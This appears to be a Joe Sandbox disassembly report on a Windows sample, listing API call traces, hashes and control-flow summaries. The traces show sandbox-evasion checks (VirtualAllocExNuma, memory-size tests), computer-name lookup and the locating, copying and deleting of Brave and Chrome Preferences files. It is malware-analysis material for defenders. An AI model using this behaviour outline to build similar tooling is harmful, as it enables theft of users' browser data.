                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: 1b6a37d9e624b11fc88c5ef00f5f727768cfe7a88ac432c581151ac1bf509b83
                                    • Instruction ID: c502eaeb401a51798182cf39746fc1e1f0a9a078cd5b643c974785db18427d75
                                    • Opcode Fuzzy Hash: 1b6a37d9e624b11fc88c5ef00f5f727768cfe7a88ac432c581151ac1bf509b83
                                    • Instruction Fuzzy Hash: 6401D171B412047BE7605AA57C1EFAA77EDA795B12F208015F708E72C0D9B1ED008A64

                                    Control-flow Graph (rendered graph omitted; entry block bee90, blocks through befa0): calls a2930, a6c40, lstrcpy, StrCmpCA and a2a20 (one block calls a2a20 10 times).
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEEC3
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 000BEEDE
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 000BEF3F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: 62f0b419e00d630df3816bf4cac1e5eae9ab96174b29908903a107f008509048
                                    • Instruction ID: 0295fa9d9ab778e27c93b6fb2538cfaaa267de78f24bef4f77e7467f622a00f6
                                    • Opcode Fuzzy Hash: 62f0b419e00d630df3816bf4cac1e5eae9ab96174b29908903a107f008509048
                                    • Instruction Fuzzy Hash: 2921FF307202469BCB61FFBCD846AEA37E4AF21300F045438B84ADB653EA30DC408B91

                                    Control-flow Graph (rendered graph omitted; entry block a10c0, blocks through a111d): calls GlobalMemoryStatusEx and ExitProcess.
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 2de34e9434d25c10897cd4fd4768559ea311af00b66252759ebec05747c0cfd9
                                    • Instruction ID: 924d017315ba98c82c442e5d1ba8ab6a8274948a3329d582b57bdc62836c2eca
                                    • Opcode Fuzzy Hash: 2de34e9434d25c10897cd4fd4768559ea311af00b66252759ebec05747c0cfd9
                                    • Instruction Fuzzy Hash: BDF027701082446BEB106AE4E80E7AEF7D8EB02350F140A2DEF9AC2180E370CC408127

                                    Control-flow Graph (rendered graph omitted; entry block b8c88, blocks through b8eef): repeated StrCmpCA comparisons plus lstrlen, lstrcpy, ExitProcess and calls to a2a20 and a2930.
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: bb20fd197d16dd550077a8fc40f0365c85f766b4022359786c0be60bbbd875a4
                                    • Instruction ID: 1de6b268110dc303e6ebcd26a357c17ba6a9a597033a9e9684d1dbcf75ceee48
                                    • Opcode Fuzzy Hash: bb20fd197d16dd550077a8fc40f0365c85f766b4022359786c0be60bbbd875a4
                                    • Instruction Fuzzy Hash: F1E09224505355EBCB14ABB9ECE8E927BA8EF99300B40189AF6058F695DA306D04CB76

                                    Control-flow Graph (rendered graph omitted; entry block c2ad0, blocks through c2b59): calls GetProcessHeap, RtlAllocateHeap and GetComputerNameA.
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2AFF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2B06
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 000C2B1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: cd0e1f59fab273057e542ed1be8f0fb81342f6d07e4ed7067c012151356792de
                                    • Instruction ID: d2ab6d77fb29ef372df4b805f57e84bee5bd8463bea123660ef5ab0b54f331b8
                                    • Opcode Fuzzy Hash: cd0e1f59fab273057e542ed1be8f0fb81342f6d07e4ed7067c012151356792de
                                    • Instruction Fuzzy Hash: 8701A272A45248ABC710DF99EC49B9DF7B8F745B22F00026BF915D3780D775190086A1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                    • ExitProcess.KERNEL32 ref: 000A1058
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000A106C
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 000A10AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                    • String ID:
                                    • API String ID: 3477276466-0
                                    • Opcode ID: ed50cfdab9a21dab181dfdcc3edebb3c706d53b6c9f06108b6da687544b84a1b
                                    • Instruction ID: a619027a9a6dcec988ba518235da02c464c0c6d0c352904d43f68f2a96f263ab
                                    • Opcode Fuzzy Hash: ed50cfdab9a21dab181dfdcc3edebb3c706d53b6c9f06108b6da687544b84a1b
                                    • Instruction Fuzzy Hash: 43E012B4A4A3457FFB2117A17C0EF127F2CAB12B06F104005F305F50D2D5D5A9419A65
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B23D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B23F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2402
                                    • lstrlen.KERNEL32(\*.*), ref: 000B240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B2436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B2486
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: c7fb711d4a19ce0a0bddc7d6627244376ca229f1edc030126a8f56e6fb130b9e
                                    • Instruction ID: f0117dbce5434c2412f65cba69fa8388abbd874b58cdd9f0d73a48c5c55e3d2d
                                    • Opcode Fuzzy Hash: c7fb711d4a19ce0a0bddc7d6627244376ca229f1edc030126a8f56e6fb130b9e
                                    • Instruction Fuzzy Hash: C0A29F30E11216AFDB61AFB8EC89AEE77F9AF15700F044029F849E7262DB34DD418B51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A16E2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A176C
                                    • lstrcat.KERNEL32(00000000), ref: 000A1776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A17F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1825
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1875
                                    • lstrcat.KERNEL32(00000000), ref: 000A187F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A18AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A18F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A18FE
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1909
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1929
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1935
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A195B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1966
                                    • lstrlen.KERNEL32(\*.*), ref: 000A1971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A198E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000A199A
                                      • Part of subcall function 000C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 000C406D
                                      • Part of subcall function 000C4040: lstrcpy.KERNEL32(00000000,?), ref: 000C40A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A19C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1A0E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1A16
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1A21
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1A41
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1A4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1A76
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1A81
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1AAC
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1AB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1ADE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1AE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1B11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000A1B45
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000A1B70
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000A1B8A
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1BC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1BFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1C03
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1C0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1C31
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1C69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1C74
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1C7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1CA2
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1CAE
                                    • lstrlen.KERNEL32(?), ref: 000A1CBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1CDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1CE9
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1CF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1D14
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1D20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1D46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1D51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1D7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1DE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1DEB
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1DF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1E19
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1E25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1E4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A1E56
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1E61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1E81
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A1E8D
                                    • lstrlen.KERNEL32(?), ref: 000A1E9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1EBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1EC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1EF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A1F3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000A1F45
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1F9F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A1FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1FE3
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A200E
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A2042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A204D
                                    • lstrlen.KERNEL32(000D1794), ref: 000A2058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2075
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2081
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: ac6d1caec6909c1f1cfa0acae1f2cc4b07b441ea0964a664d2cee463d06f77de
                                    • Instruction ID: 5eb5d959207584bc32269233c4a7bbbe42b501d17a21cc3c80f355269e74315d
                                    • Opcode Fuzzy Hash: ac6d1caec6909c1f1cfa0acae1f2cc4b07b441ea0964a664d2cee463d06f77de
                                    • Instruction Fuzzy Hash: 84925131A112169FCB61EFE8ED88AEF77B9AF16700F044135F805A7262DB34DD418BA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADBEF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000ADBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC17
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000ADC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADC4C
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADC8F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000ADCD0
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000ADCF0
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000ADD0A
                                    • lstrlen.KERNEL32(000CCFEC), ref: 000ADD1D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ADD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADD7B
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDA3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADDAF
                                    • lstrlen.KERNEL32(?), ref: 000ADDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000ADDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADE19
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADE6F
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADE7B
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADEBB
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000ADEE6
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADEF2
                                    • lstrlen.KERNEL32(00E689D0), ref: 000ADF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFA5
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000ADFB1
                                    • lstrlen.KERNEL32(00E68A60), ref: 000ADFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ADFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ADFF4
                                    • lstrlen.KERNEL32(000D1794), ref: 000ADFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE022
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000AE02E
                                    • lstrlen.KERNEL32(00E689D0), ref: 000AE03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AE06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 000AE0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 000AE0E7
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE11F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000AE12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE155
                                    • lstrcat.KERNEL32(00000000,?), ref: 000AE15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE19F
                                    • lstrcat.KERNEL32(00000000), ref: 000AE1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE1F9
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE22F
                                    • lstrlen.KERNEL32(00E68980), ref: 000AE23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE261
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000AE269
                                    • lstrlen.KERNEL32(\Brave\Preferences), ref: 000AE274
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE29B
                                    • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 000AE2A7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE2CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE30F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE349
                                    • DeleteFileA.KERNEL32(?), ref: 000AE381
                                    • StrCmpCA.SHLWAPI(?,00E6CDA0), ref: 000AE3AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE3F4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE41C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE445
                                    • StrCmpCA.SHLWAPI(?,00E689D0), ref: 000AE468
                                    • StrCmpCA.SHLWAPI(?,00E68A60), ref: 000AE47D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE4D9
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000AE4E0
                                    • StrCmpCA.SHLWAPI(?,00E6CCF8), ref: 000AE58E
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE5C4
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE639
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE678
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE6A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE6C7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE70E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE737
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE75C
                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 000AE776
                                    • DeleteFileA.KERNEL32(?), ref: 000AE7D2
                                    • StrCmpCA.SHLWAPI(?,00E688D0), ref: 000AE7FC
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE88C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE8B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE8EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE916
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE952
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 2635522530-726946144
                                    • Opcode ID: 03156f66abc69c92b6c1ef1b350242818f3ded89f6a341d47a13f78ec9978d53
                                    • Instruction ID: adc8e7a8f560adb25d46b1f12dce205e66438b686238e2151fceea863571e870
                                    • Opcode Fuzzy Hash: 03156f66abc69c92b6c1ef1b350242818f3ded89f6a341d47a13f78ec9978d53
                                    • Instruction Fuzzy Hash: C1928C71E112169FCB60EFB8EC89AEE77F9AF45300F044529F84AA7652DB34DC458B90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B18D2
                                    • lstrlen.KERNEL32(\*.*), ref: 000B18DD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B18FF
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B190B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1932
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B1947
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B1967
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1981
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B19BF
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B19F2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1A1A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1A25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1A4C
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1A5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1A80
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1AB4
                                    • lstrlen.KERNEL32(?), ref: 000B1AC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1AE5
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1AF3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B19
                                    • lstrlen.KERNEL32(00E687F0), ref: 000B1B2F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B59
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1B64
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1B8F
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1BA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1BC3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1BCF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1BF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C25
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1C30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C57
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1C69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1C8B
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1C97
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1CC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1CEF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1CFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D21
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1D33
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D55
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1D61
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1D8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1DB9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B1DC4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1DED
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1E19
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1E36
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1E42
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1E68
                                    • lstrlen.KERNEL32(00E6CD70), ref: 000B1E7E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1EB2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1EC6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1EE3
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1EEF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F15
                                    • lstrlen.KERNEL32(00E6D1A8), ref: 000B1F2B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F5F
                                    • lstrlen.KERNEL32(000D1794), ref: 000B1F73
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1F90
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1F9C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1FC2
                                    • lstrlen.KERNEL32(00E5B1D0), ref: 000B1FD8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2000
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B200B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2036
                                    • lstrlen.KERNEL32(000D1794), ref: 000B2048
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2067
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B2073
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2098
                                    • lstrlen.KERNEL32(?), ref: 000B20AC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B20D0
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B20DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2103
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B213F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000B214E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B2176
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2181
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
